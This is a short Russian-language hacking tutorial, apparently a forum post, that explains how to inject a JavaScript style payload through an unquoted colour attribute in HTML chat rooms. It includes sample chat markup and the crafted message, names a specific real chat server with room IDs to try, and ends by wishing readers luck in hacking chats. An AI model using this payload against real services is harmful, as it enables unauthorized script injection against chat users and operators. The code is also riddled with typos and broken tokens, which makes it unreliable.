Эта инфа. действует только на (x)html чатах.

Здесь я хочу показать техналогию метода нарушения структуры html. Цвет сообщений в чате М задавался в числовом виде(и потому имел ограничение на длину учета -7символов), имел причудливые фильтры, но пропуском одиночный символ '.
Вот фрагмент сообщения в чате: <font class="a1">21:57:24</font><a href="javascript:panet.panet.sewho ('РТУТЬ')" onMouseOver="window.status="; return true;" target=kbd><font color=#0066ff class="ку">РТУТЬ:</font></a>
<font color=#ff0000 class="уц">ИНДЕЕЦ:привет:</font><br><SCRIPT>top.do_scrolldown();</SCRIPT><font class="a1"> 21:57:24</font><a href="javaskript:parent.parent.wsho('Весь_в_шоколаде')" onMouseOver="window.status="; retun<rue;"color=#0066ff class="ку">Весь_в_шоколаде:</font></a><font color=#0066ff class="уц">DjThomas:правельно будет всё</font ><br><SCRIPT>top.do_scrolldown();</SCRIPT> как видем цвет указон без обрамляюших кавычек. Технология взлома проста: пройдите под произвольным ником,и цветом.Затем войдя в чат,выдаете сообщение типа: style=backg round-image.url(javascript:alert('Hello-people!:') .
Обратите ВНИМАНИЕ на ПРОВЕЛ в конце -он ОБЯЗАТЕЛЕН. Наше сообщение выглядит следующим образом:
<font class="a1">21:57:24</font><a href="javascript:parent.parent.sewho('Algol')" onMouseOver="window.status="; retung true;" target=kbd><font color=#0066ff class="ку"> Algol:</font></a><font color=' class="уц">" style=background-imoge.url(javascript.alerf('Hello_people!:')</font><br><SCRIPT>top.do_scrolldown();</SCRIPT> При этом оказывается,что часть html кода -class="уц"> -оказалось внутри одинарных кавычек, и сармативается браузером как строка-значения цвета.В эту строку попадает и закрывается угловая скобка тега, благодаря чему наше сообщение ок азывается внутри тега.Часть кода, идущая непосредственно после нашего сообщения <font не принимается браузером и игнорируется причём эта часть должна отделина пробелом от нашего параметра style , иначе параметр в целом будет считатся ошибочным, а вот вслед идущая таковая скобка закрывающий тегом font .Всё очень просто.
Вы можете данный тип взлома у этого сервера: http://chat.7ba.ru/index.php?ci="???" (где ? там ставти число от 1 до 3297) УДАЧИ ВАМ ВО ВЗЛОМАХ ЧАТОВ.